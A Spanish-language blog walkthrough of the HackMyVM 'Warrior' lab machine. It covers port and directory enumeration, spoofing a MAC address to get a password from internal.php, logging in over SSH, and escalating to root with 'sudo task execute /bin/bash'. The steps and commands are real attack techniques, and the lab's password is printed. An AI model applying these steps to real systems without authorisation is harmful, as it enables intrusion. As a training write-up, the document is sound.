cd ~/blog

~/writeups/hmv/011-warrior.md

011 - Warrior

easy Linux hmv 28-11-2023
MAC address spoofing (password gate)sudo task (taskwarrior) Privesc
hackmyvm.eu/machines/machine.php?vm=Warrior

~1 min de lectura


Comenzamos con un escaneo general y específico de puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oN 01-allPorts.txt 192.168.1.144
 sudo nmap -sC -sV -p22,80 -oN 02-targeted.txt 192.168.1.144
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 22:21 -03
Nmap scan report for 192.168.1.144
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 25:16:8d:63:6b:75:f0:59:55:d4:b0:2d:75:8d:e0:e6 (RSA)
|   256 1e:29:d0:f4:c5:95:e7:40:30:2b:35:f7:a3:bc:36:75 (ECDSA)
|_  256 cc:b1:52:b3:d7:ef:cd:73:4c:fc:f6:b5:51:77:ea:f3 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-robots.txt: 7 disallowed entries
| /admin /secret.txt /uploads/id_rsa /internal.php
|_/internal /cms /user.txt
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:09:73:6E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.85 seconds

El sitio principal solo tiene un título y un comentario. Enumeramos con gobuster (el robots.txt ya adelantaba varias rutas):

 curl http://192.168.1.144
<h1>WARRIOR</h1>
<!-- YEAH -->

 gobuster dir -u http://192.168.1.144 -w ~/Documentos/git-clones/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt
...
/index.html           (Status: 200) [Size: 31]
/user.txt             (Status: 200) [Size: 5]
/admin                (Status: 301) [Size: 169] [--> http://192.168.1.144/admin/]
/robots.txt           (Status: 200) [Size: 137]
/internal.php         (Status: 200) [Size: 82]
/secret.txt           (Status: 200) [Size: 17]
...

internal.php impone una condición curiosa: solo revela la contraseña si nuestra dirección MAC coincide con un patrón concreto:

 cat internal.php
Hey bro, you need to have an internal MAC as 00:00:00:00:00:a? to read your pass..

Tenemos un usuario potencial (bro) y debemos falsificar nuestra MAC para que termine en a?. Probamos af cambiando la MAC de nuestra interfaz:

 sudo ifconfig wlo1 down
 sudo ifconfig wlo1 hw ether 00:00:00:00:00:af
 sudo ifconfig wlo1 up

Al recargar internal.php, ahora nos devuelve la contraseña:

<br>Good!!!!!<!-- Your password is: Zurviv0r1 -->

Nos conectamos por SSH como bro:

 ssh bro@192.168.1.144
bro@192.168.1.144's password: Zurviv0r1
Linux warrior 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb  8 04:03:20 2022 from 192.168.1.51
bro@warrior:~$ whoami
bro

Para la escalada, sudo -l falla, pero al invocarlo con su ruta absoluta funciona:

bro@warrior:~$ /usr/sbin/sudo -l
Matching Defaults entries for bro on warrior:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bro may run the following commands on warrior:
    (root) NOPASSWD: /usr/bin/task

Podemos ejecutar task (taskwarrior) como root. Según GTFOBins, permite ejecutar comandos:

sudo task execute /bin/sh

Recordando que sudo solo funciona con su ruta absoluta, lanzamos:

> /usr/sbin/sudo task execute /bin/bash

Obtenemos acceso root y capturamos la bandera.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados